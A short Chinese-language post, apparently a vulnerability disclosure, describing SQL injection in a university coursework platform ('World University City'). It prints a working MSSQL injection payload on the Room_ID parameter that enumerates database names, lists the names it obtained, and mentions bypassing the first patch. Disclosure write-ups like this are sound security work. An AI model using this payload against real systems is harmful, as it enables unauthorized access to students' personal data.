世界大学城为目前上百所大学使用的一套网络办公系统。。。
高等院校和高职院校使用居多。。
我们嫩学校就用这个交作业，麻烦死了。。
mssql注入。。。。。一个盲注,一个是显错注入。。。。。。头疼。。。。
服务器启用了session认证，工具会302.手工上、
判断数据库为mssql

看点

可以看到确实存在，不多打字了。。。下面的你们懂的

Room_ID=18 and 0<(select count(*) from 

master.dbo.sysdatabases where name>1 and dbid=1);

依次提交 dbid = 2.3.4 . . . . . 得到所有数据库名

共七个数据库名：
master
tempdb
model
msdb
worlduc_db
ImChat
SP_LiveTecher

数据库太大，而且关系到百万大学生妹子的资料安全。怕被喝茶。到此打住了。。。。你们懂得。。。
提交给了管理员。管理员很热情的给送了个礼品，修补上了。。
用空虚浪子心大神的话：礼品很给力，修复不给力。用or和编码转换就绕过了。继续注入。。
再次提交。。这次修复给力多了。